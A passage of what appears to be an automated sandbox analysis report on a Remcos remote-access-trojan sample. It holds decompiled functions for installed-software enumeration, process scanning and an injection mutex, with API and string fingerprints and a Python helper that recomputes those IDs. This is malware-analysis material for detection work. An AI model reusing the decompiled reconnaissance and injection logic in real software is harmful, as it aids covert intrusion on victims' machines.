                                    								E006E09BF( &_v136, _v8);
                                    								 *_t208 = L"InstallDate";
                                    								E006E09BF( &_v112, _v8);
                                    								 *_t208 = L"UninstallString";
                                    								E006E09BF( &_v88, _v8);
                                    								__eflags = E006D9DB5();
                                    								if(__eflags == 0) {
                                    									E006D3311(E006D30A6(_t129,  &_v208, E006D30A6(_t129,  &_v232, E006D4429(_t129,  &_v256, E006D30A6(_t129,  &_v280, E006D4429(_t129,  &_v304, E006D30A6(_t129,  &_v328, E006D4429(_t129,  &_v352, E006D30A6(_t129,  &_v376, E006D4429(_t129,  &_v400, E006D30A6(_t129,  &_v424, E006D4429(_t129,  &_v448, E006D7514( &_v472,  &_v40, __eflags, 0x7359c4), __eflags,  &_v160), _t206, __eflags, 0x7359c4), __eflags,  &_v112), _t206, __eflags, 0x7359c4), __eflags,  &_v184), _t206, __eflags, 0x7359c4), __eflags,  &_v136), _t206, __eflags, 0x7359c4), __eflags,  &_v88), _t206, __eflags, 0x7359c4), _t206, __eflags, "\n"));
                                    									E006D1EF0();
                                    									E006D1EF0();
                                    									E006D1EF0();
                                    									E006D1EF0();
                                    									E006D1EF0();
                                    									E006D1EF0();
                                    									E006D1EF0();
                                    									E006D1EF0();
                                    									E006D1EF0();
                                    									E006D1EF0();
                                    									E006D1EF0();
                                    									E006D1EF0();
                                    								}
                                    								RegCloseKey(_v8);
                                    								E006D1EF0();
                                    								E006D1EF0();
                                    								E006D1EF0();
                                    								E006D1EF0();
                                    								E006D1EF0();
                                    								E006D1EF0();
                                    								goto L8;
                                    							}
                                    						}
                                    						__eflags = 0;
                                    						_push(0);
                                    						_push(0);
                                    						_push(0);
                                    						_push(0);
                                    						_push( &_v16);
                                    						_push( &_v1500);
                                    						_push(_t206);
                                    					}
                                    					RegCloseKey(_v12);
                                    					E006D331A(_t129, _t207, __eflags,  &_v64);
                                    					E006D1EF0();
                                    				} else {
                                    					E006D427F(__ebx, _t207, 0x72f724);
                                    				}
                                    				return _t207;
                                    			}

                                    Instruction addresses: 0x006e7c05, 0x006e7c25, 0x006e7c2f, 0x006e7c45, 0x006e7c4c, 0x006e7c4e, 0x006e7c58, 0x006e7c59, 0x006e7c5a, 0x006e7c5b, 0x006e7c5c, 0x006e7c63, 0x006e7c64, 0x006e7ed8, 0x006e7edb, 0x006e7ee1, 0x006e7ee6, 0x00000000, 0x00000000, 0x006e7c6a, 0x006e7c6c, 0x006e7ebe, 0x006e7ebe, 0x006e7ebe, 0x006e7ebf, 0x006e7c72, 0x006e7c87, 0x006e7c8d, 0x006e7c8f, 0x006e7ca0, 0x006e7cae, 0x006e7cb5, 0x006e7cc3, 0x006e7cca, 0x006e7cd8, 0x006e7cdf, 0x006e7cea, 0x006e7cf1, 0x006e7cfc, 0x006e7d03, 0x006e7d11, 0x006e7d13, 0x006e7df3, 0x006e7dfe, 0x006e7e09, 0x006e7e14, 0x006e7e1f, 0x006e7e2a, 0x006e7e35, 0x006e7e40, 0x006e7e4b, 0x006e7e56, 0x006e7e61, 0x006e7e6c, 0x006e7e77, 0x006e7e77, 0x006e7e7f, 0x006e7e88, 0x006e7e90, 0x006e7e9b, 0x006e7ea6, 0x006e7eb1, 0x006e7eb9, 0x00000000, 0x006e7eb9, 0x006e7c8f, 0x006e7ec6, 0x006e7ec8, 0x006e7ec9, 0x006e7eca, 0x006e7ecb, 0x006e7ecf, 0x006e7ed6, 0x006e7ed7, 0x006e7ed7, 0x006e7eef, 0x006e7efb, 0x006e7f03, 0x006e7c31, 0x006e7c38, 0x006e7c38, 0x006e7f0f

                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 006E7C27
                                    • RegEnumKeyExA.ADVAPI32 ref: 006E7EDB
                                    • RegCloseKey.ADVAPI32(?), ref: 006E7EEF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CloseEnumOpen
                                    • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                    • API String ID: 1332880857-3714951968
                                    • Opcode ID: 6a47208fe257f0dd467a00e33911a7a903acc3e41bdf01c72302e798478e3972
                                    • Instruction ID: 958d3012b0c2dc191f13729c139359da32fa794bbc7b0eb775ff72c5e1db474f
                                    • Opcode Fuzzy Hash: 6a47208fe257f0dd467a00e33911a7a903acc3e41bdf01c72302e798478e3972
                                    • Instruction Fuzzy Hash: 69813271D04158ABDB64EBA0ED52EEEB37BAF50300F1041AEE816A6252EF705F45CF64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E00719546(intOrPtr _a4) {
                                    				intOrPtr _v8;
                                    				intOrPtr _t25;
                                    				intOrPtr* _t26;
                                    				intOrPtr _t28;
                                    				intOrPtr* _t29;
                                    				intOrPtr* _t31;
                                    				intOrPtr* _t45;
                                    				intOrPtr* _t46;
                                    				intOrPtr* _t47;
                                    				intOrPtr* _t55;
                                    				intOrPtr* _t70;
                                    				intOrPtr _t74;
                                    
                                    				_t74 = _a4;
                                    				_t25 =  *((intOrPtr*)(_t74 + 0x88));
                                    				if(_t25 != 0 && _t25 != 0x73a188) {
                                    					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
                                    					if(_t45 != 0 &&  *_t45 == 0) {
                                    						_t46 =  *((intOrPtr*)(_t74 + 0x84));
                                    						if(_t46 != 0 &&  *_t46 == 0) {
                                    							E007101F5(_t46);
                                    							E00718782( *((intOrPtr*)(_t74 + 0x88)));
                                    						}
                                    						_t47 =  *((intOrPtr*)(_t74 + 0x80));
                                    						if(_t47 != 0 &&  *_t47 == 0) {
                                    							E007101F5(_t47);
                                    							E00718C3C( *((intOrPtr*)(_t74 + 0x88)));
                                    						}
                                    						E007101F5( *((intOrPtr*)(_t74 + 0x7c)));
                                    						E007101F5( *((intOrPtr*)(_t74 + 0x88)));
                                    					}
                                    				}
                                    				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
                                    				if(_t26 != 0 &&  *_t26 == 0) {
                                    					E007101F5( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
                                    					E007101F5( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
                                    					E007101F5( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
                                    					E007101F5( *((intOrPtr*)(_t74 + 0x8c)));
                                    				}
                                    				E007196B9( *((intOrPtr*)(_t74 + 0x9c)));
                                    				_t28 = 6;
                                    				_t55 = _t74 + 0xa0;
                                    				_v8 = _t28;
                                    				_t70 = _t74 + 0x28;
                                    				do {
                                    					if( *((intOrPtr*)(_t70 - 8)) != 0x73a2a8) {
                                    						_t31 =  *_t70;
                                    						if(_t31 != 0 &&  *_t31 == 0) {
                                    							E007101F5(_t31);
                                    							E007101F5( *_t55);
                                    						}
                                    						_t28 = _v8;
                                    					}
                                    					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
                                    						_t29 =  *((intOrPtr*)(_t70 - 4));
                                    						if(_t29 != 0 &&  *_t29 == 0) {
                                    							E007101F5(_t29);
                                    						}
                                    						_t28 = _v8;
                                    					}
                                    					_t55 = _t55 + 4;
                                    					_t70 = _t70 + 0x10;
                                    					_t28 = _t28 - 1;
                                    					_v8 = _t28;
                                    				} while (_t28 != 0);
                                    				return E007101F5(_t74);
                                    			}

                                    Instruction addresses: 0x0071954e, 0x00719552, 0x0071955a, 0x00719563, 0x00719568, 0x0071956f, 0x00719577, 0x0071957f, 0x0071958a, 0x00719590, 0x00719591, 0x00719599, 0x007195a1, 0x007195ac, 0x007195b2, 0x007195b6, 0x007195c1, 0x007195c7, 0x00719568, 0x007195c8, 0x007195d0, 0x007195e3, 0x007195f6, 0x00719604, 0x0071960f, 0x00719614, 0x0071961d, 0x00719625, 0x00719626, 0x0071962c, 0x0071962f, 0x00719632, 0x00719639, 0x0071963b, 0x0071963f, 0x00719647, 0x0071964e, 0x00719654, 0x00719655, 0x00719655, 0x0071965c, 0x0071965e, 0x00719663, 0x0071966b, 0x00719670, 0x00719671, 0x00719671, 0x00719674, 0x00719677, 0x0071967a, 0x0071967d, 0x0071967d, 0x0071968f

                                    APIs
                                    • ___free_lconv_mon.LIBCMT ref: 0071958A
                                      • Part of subcall function 00718782: _free.LIBCMT ref: 0071879F
                                      • Part of subcall function 00718782: _free.LIBCMT ref: 007187B1
                                      • Part of subcall function 00718782: _free.LIBCMT ref: 007187C3
                                      • Part of subcall function 00718782: _free.LIBCMT ref: 007187D5
                                      • Part of subcall function 00718782: _free.LIBCMT ref: 007187E7
                                      • Part of subcall function 00718782: _free.LIBCMT ref: 007187F9
                                      • Part of subcall function 00718782: _free.LIBCMT ref: 0071880B
                                      • Part of subcall function 00718782: _free.LIBCMT ref: 0071881D
                                      • Part of subcall function 00718782: _free.LIBCMT ref: 0071882F
                                      • Part of subcall function 00718782: _free.LIBCMT ref: 00718841
                                      • Part of subcall function 00718782: _free.LIBCMT ref: 00718853
                                      • Part of subcall function 00718782: _free.LIBCMT ref: 00718865
                                      • Part of subcall function 00718782: _free.LIBCMT ref: 00718877
                                    • _free.LIBCMT ref: 0071957F
                                      • Part of subcall function 007101F5: HeapFree.KERNEL32(00000000,00000000,?,00718EEF,?,00000000,?,00000000,?,00719193,?,00000007,?,?,007196DE,?), ref: 0071020B
                                      • Part of subcall function 007101F5: GetLastError.KERNEL32(?,?,00718EEF,?,00000000,?,00000000,?,00719193,?,00000007,?,?,007196DE,?,?), ref: 0071021D
                                    • _free.LIBCMT ref: 007195A1
                                    • _free.LIBCMT ref: 007195B6
                                    • _free.LIBCMT ref: 007195C1
                                    • _free.LIBCMT ref: 007195E3
                                    • _free.LIBCMT ref: 007195F6
                                    • _free.LIBCMT ref: 00719604
                                    • _free.LIBCMT ref: 0071960F
                                    • _free.LIBCMT ref: 00719647
                                    • _free.LIBCMT ref: 0071964E
                                    • _free.LIBCMT ref: 0071966B
                                    • _free.LIBCMT ref: 00719683
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                    • String ID:
                                    • API String ID: 161543041-0
                                    • Opcode ID: aec16b5fdfdb84c59967bd0702af118d627579930d2c6790275f901fd2c91985
                                    • Instruction ID: 57a009a594a9f51d1dfa4252a8f8cb1dd781e9d455bc898ea6d03ad3bcba0f2f
                                    • Opcode Fuzzy Hash: aec16b5fdfdb84c59967bd0702af118d627579930d2c6790275f901fd2c91985
                                    • Instruction Fuzzy Hash: 5E317831600209EEEB21AA3CD849BDA73E9AF00350F104429E649E71D1DE7DEDD69B60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E105DA3B9(intOrPtr _a4) {
                                    				intOrPtr _v8;
                                    				intOrPtr _t25;
                                    				intOrPtr* _t26;
                                    				intOrPtr _t28;
                                    				intOrPtr* _t29;
                                    				intOrPtr* _t31;
                                    				intOrPtr* _t45;
                                    				intOrPtr* _t46;
                                    				intOrPtr* _t47;
                                    				intOrPtr* _t55;
                                    				intOrPtr* _t70;
                                    				intOrPtr _t74;
                                    
                                    				_t74 = _a4;
                                    				_t25 =  *((intOrPtr*)(_t74 + 0x88));
                                    				if(_t25 != 0 && _t25 != 0x46a188) {
                                    					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
                                    					if(_t45 != 0 &&  *_t45 == 0) {
                                    						_t46 =  *((intOrPtr*)(_t74 + 0x84));
                                    						if(_t46 != 0 &&  *_t46 == 0) {
                                    							E105D1068(_t46);
                                    							E105D95F5( *((intOrPtr*)(_t74 + 0x88)));
                                    						}
                                    						_t47 =  *((intOrPtr*)(_t74 + 0x80));
                                    						if(_t47 != 0 &&  *_t47 == 0) {
                                    							E105D1068(_t47);
                                    							L105D9AAF( *((intOrPtr*)(_t74 + 0x88)));
                                    						}
                                    						E105D1068( *((intOrPtr*)(_t74 + 0x7c)));
                                    						E105D1068( *((intOrPtr*)(_t74 + 0x88)));
                                    					}
                                    				}
                                    				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
                                    				if(_t26 != 0 &&  *_t26 == 0) {
                                    					E105D1068( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
                                    					E105D1068( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
                                    					E105D1068( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
                                    					E105D1068( *((intOrPtr*)(_t74 + 0x8c)));
                                    				}
                                    				E105DA52C( *((intOrPtr*)(_t74 + 0x9c)));
                                    				_t28 = 6;
                                    				_t16 = _t74 + 0xa0; // 0xa0
                                    				_t55 = _t16;
                                    				_v8 = _t28;
                                    				_t18 = _t74 + 0x28; // 0x28
                                    				_t70 = _t18;
                                    				do {
                                    					if( *((intOrPtr*)(_t70 - 8)) != 0x46a2a8) {
                                    						_t31 =  *_t70;
                                    						if(_t31 != 0 &&  *_t31 == 0) {
                                    							E105D1068(_t31);
                                    							E105D1068( *_t55);
                                    						}
                                    						_t28 = _v8;
                                    					}
                                    					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
                                    						_t29 =  *((intOrPtr*)(_t70 - 4));
                                    						if(_t29 != 0 &&  *_t29 == 0) {
                                    							E105D1068(_t29);
                                    						}
                                    						_t28 = _v8;
                                    					}
                                    					_t55 = _t55 + 4;
                                    					_t70 = _t70 + 0x10;
                                    					_t28 = _t28 - 1;
                                    					_v8 = _t28;
                                    				} while (_t28 != 0);
                                    				return E105D1068(_t74);
                                    			}

                                    Instruction addresses: 0x105da3c1, 0x105da3c5, 0x105da3cd, 0x105da3d6, 0x105da3db, 0x105da3e2, 0x105da3ea, 0x105da3f2, 0x105da3fd, 0x105da403, 0x105da404, 0x105da40c, 0x105da414, 0x105da41f, 0x105da425, 0x105da429, 0x105da434, 0x105da43a, 0x105da3db, 0x105da43b, 0x105da443, 0x105da456, 0x105da469, 0x105da477, 0x105da482, 0x105da487, 0x105da490, 0x105da498, 0x105da499, 0x105da499, 0x105da49f, 0x105da4a2, 0x105da4a2, 0x105da4a5, 0x105da4ac, 0x105da4ae, 0x105da4b2, 0x105da4ba, 0x105da4c1, 0x105da4c7, 0x105da4c8, 0x105da4c8, 0x105da4cf, 0x105da4d1, 0x105da4d6, 0x105da4de, 0x105da4e3, 0x105da4e4, 0x105da4e4, 0x105da4e7, 0x105da4ea, 0x105da4ed, 0x105da4f0, 0x105da4f0, 0x105da502

                                    APIs
                                    • _free.LIBCMT ref: 105DA3F2
                                    • ___free_lconv_mon.LIBCMT ref: 105DA3FD
                                      • Part of subcall function 105D95F5: _free.LIBCMT ref: 105D9612
                                      • Part of subcall function 105D95F5: _free.LIBCMT ref: 105D9624
                                      • Part of subcall function 105D95F5: _free.LIBCMT ref: 105D9636
                                      • Part of subcall function 105D95F5: _free.LIBCMT ref: 105D9648
                                      • Part of subcall function 105D95F5: _free.LIBCMT ref: 105D965A
                                      • Part of subcall function 105D95F5: _free.LIBCMT ref: 105D966C
                                      • Part of subcall function 105D95F5: _free.LIBCMT ref: 105D967E
                                      • Part of subcall function 105D95F5: _free.LIBCMT ref: 105D9690
                                      • Part of subcall function 105D95F5: _free.LIBCMT ref: 105D96A2
                                      • Part of subcall function 105D95F5: _free.LIBCMT ref: 105D96B4
                                      • Part of subcall function 105D95F5: _free.LIBCMT ref: 105D96C6
                                      • Part of subcall function 105D95F5: _free.LIBCMT ref: 105D96D8
                                      • Part of subcall function 105D95F5: _free.LIBCMT ref: 105D96EA
                                    • _free.LIBCMT ref: 105DA414
                                    • _free.LIBCMT ref: 105DA429
                                    • _free.LIBCMT ref: 105DA434
                                    • _free.LIBCMT ref: 105DA456
                                    • _free.LIBCMT ref: 105DA469
                                    • _free.LIBCMT ref: 105DA477
                                    • _free.LIBCMT ref: 105DA482
                                    • _free.LIBCMT ref: 105DA4BA
                                    • _free.LIBCMT ref: 105DA4C1
                                    • _free.LIBCMT ref: 105DA4DE
                                    • _free.LIBCMT ref: 105DA4F6
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.410957066.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: _free$___free_lconv_mon
                                    • String ID:
                                    • API String ID: 3658870901-0
                                    • Opcode ID: 8a20b96b7aaffb75a5641ff102c264423d38ea1ece813b4e11af4ccf0b9ee35c
                                    • Instruction ID: 97a125569a78fb572539959a746e9932db5aa00dd58332f6447a08c8cdd70d4a
                                    • Opcode Fuzzy Hash: 8a20b96b7aaffb75a5641ff102c264423d38ea1ece813b4e11af4ccf0b9ee35c
                                    • Instruction Fuzzy Hash: CE315731600B45AFEB20AA3DD84DB4BBBE8EF40290F51842BE449D6350DFB5BD85CB25
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 97%
                                    			E006DCE44(void* __eflags, char _a4) {
                                    				void* _v8;
                                    				char _v32;
                                    				char _v56;
                                    				char _v60;
                                    				char _v64;
                                    				char _v68;
                                    				char _v72;
                                    				char _v96;
                                    				char _v120;
                                    				char _v648;
                                    				intOrPtr _v676;
                                    				void* _v684;
                                    				short _v1204;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				void* _t76;
                                    				struct _SECURITY_ATTRIBUTES* _t106;
                                    				char* _t111;
                                    				void* _t158;
                                    				void* _t161;
                                    
                                    				_t106 = 0;
                                    				GetModuleFileNameW(0,  &_v1204, 0x104);
                                    				_t149 = "1";
                                    				if(E006D7744("1") != 0) {
                                    					L14:
                                    					E006D1EFA( &_a4, _t149, _t159, E006E6E1B(_t106,  &_v120, _t149));
                                    					_t111 =  &_v120;
                                    					E006D1EF0();
                                    					if(E006E7614(_t111) != 0) {
                                    						_push(_t111);
                                    						if(E006DD4AF( &_a4, L"Program Files\\") != 0xffffffff) {
                                    							E006DD4D0(_t106,  &_a4, _t157, _t73, 0xe, L"Program Files (x86)\\");
                                    						}
                                    					}
                                    					if(E006DEAE5( &_v1204,  &_a4) != 0) {
                                    						L22:
                                    						E006D1EF0();
                                    						return _t106;
                                    					} else {
                                    						L18:
                                    						_t158 = CreateMutexA(_t106, 1, "Remcos_Mutex_Inj");
                                    						E006D20D5(_t106,  &_v96);
                                    						E006E79DC(E006D1EEB(0x73c500),  &_v96);
                                    						E006D1F95( &_v96);
                                    						if(E006E432B(E006D1EEB( &_a4)) == 0) {
                                    							CloseHandle(_t158);
                                    						} else {
                                    							_t106 = 1;
                                    							E006E0BB0(0x73c518, E006D1F95(0x73c518), "Inj", 1);
                                    						}
                                    						E006D1FC7();
                                    						goto L22;
                                    					}
                                    				}
                                    				E006D1F6D(0,  &_v32);
                                    				_t76 = CreateToolhelp32Snapshot(2, 0);
                                    				_v8 = _t76;
                                    				_v684 = 0x22c;
                                    				Process32FirstW(_t76,  &_v684);
                                    				while(Process32NextW(_v8,  &_v684) != 0) {
                                    					E006D427F(_t106,  &_v56,  &_v648);
                                    					_t157 = E006D230A( &_v56,  &_v60);
                                    					_t159 = E006D22CD( &_v56,  &_v64);
                                    					E006D8226( &_v72,  *((intOrPtr*)(E006D230A( &_v56,  &_v68))),  *_t84,  *_t82);
                                    					_t161 = _t161 + 0xc;
                                    					if(E006D9EAC( &_a4) != 0) {
                                    						E006D1EFA( &_v32, _v676, _t159, E006E7678( &_v120, _v676));
                                    						E006D1EF0();
                                    						if(E006D7744( &_v1204) == 0) {
                                    							_t149 = 0x72f724;
                                    							if(E006D7744(0x72f724) != 0 || E006E7642(_v676) != 0) {
                                    								E006D1EF0();
                                    								L13:
                                    								E006D1EF0();
                                    								goto L14;
                                    							} else {
                                    								E006D9E56( &_v32);
                                    								E006D1EF0();
                                    								break;
                                    							}
                                    						}
                                    						E006D1EF0();
                                    						E006D1EF0();
                                    						goto L22;
                                    					}
                                    					E006D1EF0();
                                    				}
                                    				CloseHandle(_v8);
                                    				_t149 = 0x72f724;
                                    				if(E006D7744(0x72f724) != 0) {
                                    					goto L13;
                                    				}
                                    				E006D1EF0();
                                    				goto L18;
                                    			}
                                    Instruction address column 0x006dce5c to 0x006dd0b4 (disassembly text not preserved in this extraction)

                                    APIs
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104,0073C578,00000000,00000001), ref: 006DCE5F
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 006DCE85
                                    • Process32FirstW.KERNEL32(00000000,?), ref: 006DCEA0
                                    • Process32NextW.KERNEL32(006DC873,0000022C), ref: 006DCF11
                                    • CloseHandle.KERNEL32(006DC873,?,00000000,?,?,?), ref: 006DCF1E
                                    • CreateMutexA.KERNEL32(00000000,00000001,Remcos_Mutex_Inj,00000000), ref: 006DD034
                                    • CloseHandle.KERNEL32(00000000), ref: 006DD096
                                      • Part of subcall function 006E7678: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 006E768D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCreateHandleProcess32$FileFirstModuleMutexNameNextOpenProcessSnapshotToolhelp32
                                    • String ID: Inj$Program Files (x86)\$Program Files\$Remcos_Mutex_Inj
                                    • API String ID: 193334293-694575909
                                    • Opcode ID: 8d3d556dd6d1af76461fc363481045c8ceb1f4ee5059706bf77637d5d63b9e12
                                    • Instruction ID: 39e3fbd3bf72a42c42710e35730a706e183420ceb89388d4644e49fcf13d4970
                                    • Opcode Fuzzy Hash: 8d3d556dd6d1af76461fc363481045c8ceb1f4ee5059706bf77637d5d63b9e12
                                    • Instruction Fuzzy Hash: 6A616030D00209ABCF54FFA0E8969EDB77BAF51344F10416EF81667292EF745E0ACA58
                                    Uniqueness

                                    Uniqueness Score: -1.00%
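The "API ID" and "String ID" lines in the Similarity block are the keys the report uses to relate this function to functions in other samples, so being able to recompute them from the API bullets is useful when grepping other reports for the same CreateMutexA / CreateToolhelp32Snapshot / Process32Next combination. The script below is an added example, not part of the sandbox report or its tooling. The tokenisation rule it implements is inferred from the two listings above (the _free listing at 105DA3D6 and E006DCE44), not taken from vendor documentation: camel-case API names are split into words, a leading "Get" and a trailing A/W suffix are dropped, CRT names beginning with an underscore are kept whole, words occurring more than once (subcall lines included) are sorted and concatenated before the "$", words occurring once after it; the String ID is the sorted strings joined with "$". The numeric "API String ID" hashes are not reproduced. Sample input is copied from the listings on this page.

```python
"""Recompute the 'API ID' and 'String ID' fingerprints of a Joe Sandbox
function listing from the bullet lines under its 'APIs' / 'Strings' headers.

Added example, not from the report. The splitting rule (drop leading 'Get',
drop trailing A/W, keep underscore-prefixed CRT names whole) is inferred from
the listings on this page and is an assumption beyond them.
"""
import re
from collections import Counter
from dataclasses import dataclass
from typing import List, Optional

# One bullet under "APIs":  • Name.MODULE(args), ref: ADDR   or   • Name.MODULE ref: ADDR
# optionally prefixed with "Part of subcall function CALLER: ".
API_LINE = re.compile(
    r"•\s*(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
CAMEL = re.compile(r"[A-Z][a-z0-9]*|[a-z0-9]+")


@dataclass
class ApiRef:
    api: str
    module: str
    args: List[str]
    ref: int
    subcall_of: Optional[int]   # caller address for "Part of subcall function" lines


def parse_api_lines(text: str) -> List[ApiRef]:
    """Parse every API bullet in a listing; lines that do not match are ignored."""
    refs = []
    for line in text.splitlines():
        m = API_LINE.search(line)
        if not m:
            continue
        args = [a for a in (m.group("args") or "").split(",") if a]
        caller = m.group("caller")
        refs.append(ApiRef(m.group("api"), m.group("module"), args,
                           int(m.group("ref"), 16),
                           int(caller, 16) if caller else None))
    return refs


def api_words(name: str) -> List[str]:
    """Split an API name into the words the fingerprint is built from (inferred rule)."""
    if name.startswith("_"):
        return [name]                      # _free, ___free_lconv_mon stay whole
    words = CAMEL.findall(name)
    if words and words[0] == "Get":
        words = words[1:]                  # GetModuleFileNameW -> Module File Name
    if words and words[-1] in ("A", "W"):
        words = words[:-1]                 # drop the ANSI/Unicode suffix
    return words


def api_id(text: str) -> str:
    """Repeated words sorted, then '$', then words seen once, sorted."""
    counts = Counter(w for r in parse_api_lines(text) for w in api_words(r.api))
    repeated = "".join(sorted(w for w, c in counts.items() if c > 1))
    single = "".join(sorted(w for w, c in counts.items() if c == 1))
    return "$".join(part for part in (repeated, single) if part)


def string_id(strings: List[str]) -> str:
    return "$".join(sorted(strings))


# Bullet lines copied from the E006DCE44 listing above.
E006DCE44_APIS = """
• GetModuleFileNameW.KERNEL32(00000000,?,00000104,0073C578,00000000,00000001), ref: 006DCE5F
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 006DCE85
• Process32FirstW.KERNEL32(00000000,?), ref: 006DCEA0
• Process32NextW.KERNEL32(006DC873,0000022C), ref: 006DCF11
• CloseHandle.KERNEL32(006DC873,?,00000000,?,?,?), ref: 006DCF1E
• CreateMutexA.KERNEL32(00000000,00000001,Remcos_Mutex_Inj,00000000), ref: 006DD034
• CloseHandle.KERNEL32(00000000), ref: 006DD096
  • Part of subcall function 006E7678: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 006E768D
"""
E006DCE44_STRINGS = ["Remcos_Mutex_Inj", "Program Files\\", "Inj", "Program Files (x86)\\"]

# A subset of the bullet lines from the _free listing at 105DA3D6 above.
E105DA3D6_APIS = """
• _free.LIBCMT ref: 105DA3F2
• ___free_lconv_mon.LIBCMT ref: 105DA3FD
  • Part of subcall function 105D95F5: _free.LIBCMT ref: 105D9612
• _free.LIBCMT ref: 105DA414
"""

if __name__ == "__main__":
    print(api_id(E006DCE44_APIS))
    print(string_id(E006DCE44_STRINGS))
    print(api_id(E105DA3D6_APIS))
```

Run against the lines above it yields exactly the two API IDs and the String ID printed in the report's Similarity blocks. When the rule is applied to other reports, treat a mismatch as a sign that the inferred splitting does not cover some name form (lower-case exports, other verb prefixes) rather than as a difference in the function.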

                                    C-Code - Quality: 97%
                                    			E00718880(void* __edx, char _a4) {
                                    				void* _v8;
                                    				void* _v12;
                                    				signed int _v16;
                                    				intOrPtr* _v20;
                                    				signed int _v24;
                                    				char _v28;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				signed int _t105;
                                    				char _t195;
                                    				char _t210;
                                    				signed int _t213;
                                    				void* _t224;
                                    				char* _t226;
                                    				signed int _t227;
                                    				signed int _t231;
                                    				signed int _t232;
                                    				void* _t234;
                                    				void* _t236;
                                    				signed int _t237;
                                    				signed int _t238;
                                    				signed int _t239;
                                    				signed int _t240;
                                    				signed int _t241;
                                    				signed int _t242;
                                    				signed int _t243;
                                    				signed int _t244;
                                    				signed int _t245;
                                    				signed int _t246;
                                    				signed int _t247;
                                    				signed int _t248;
                                    				signed int _t249;
                                    				signed int _t250;
                                    				signed int _t251;
                                    				signed int _t252;
                                    				signed int _t253;
                                    				signed int _t254;
                                    				signed int _t255;
                                    				signed int _t256;
                                    				char* _t257;
                                    
                                    				_t224 = __edx;
                                    				_t210 = _a4;
                                    				_v16 = 0;
                                    				_v28 = _t210;
                                    				_v24 = 0;
                                    				if( *((intOrPtr*)(_t210 + 0xac)) != 0 ||  *((intOrPtr*)(_t210 + 0xb0)) != 0) {
                                    					_t234 = E0070F348(0, 1, 0x50);
                                    					_v8 = _t234;
                                    					E007101F5(0);
                                    					if(_t234 != 0) {
                                    						_t227 = E0070F348(0, 1, 4);
                                    						_v12 = _t227;
                                    						E007101F5(0);
                                    						if(_t227 != 0) {
                                    							if( *((intOrPtr*)(_t210 + 0xac)) == 0) {
                                    								_t213 = 0x14;
                                    								memcpy(_v8, 0x73a188, _t213 << 2);
                                    								L25:
                                    								_t236 = _v8;
                                    								_t231 = _v16;
                                    								 *_t236 =  *( *(_t210 + 0x88));
                                    								 *((intOrPtr*)(_t236 + 4)) =  *((intOrPtr*)( *(_t210 + 0x88) + 4));
                                    								 *((intOrPtr*)(_t236 + 8)) =  *((intOrPtr*)( *(_t210 + 0x88) + 8));
                                    								 *((intOrPtr*)(_t236 + 0x30)) =  *((intOrPtr*)( *(_t210 + 0x88) + 0x30));
                                    								 *((intOrPtr*)(_t236 + 0x34)) =  *((intOrPtr*)( *(_t210 + 0x88) + 0x34));
                                    								 *_v12 = 1;
                                    								if(_t231 != 0) {
                                    									 *_t231 = 1;
                                    								}
                                    								goto L27;
                                    							}
                                    							_t232 = E0070F348(0, 1, 4);
                                    							_v16 = _t232;
                                    							E007101F5(0);
                                    							if(_t232 != 0) {
                                    								_t233 =  *((intOrPtr*)(_t210 + 0xac));
                                    								_t14 = _t234 + 0xc; // 0xc
                                    								_t237 = E0071B0F4(_t210, _t224,  *((intOrPtr*)(_t210 + 0xac)), _t234,  &_v28, 1,  *((intOrPtr*)(_t210 + 0xac)), 0x15, _t14);
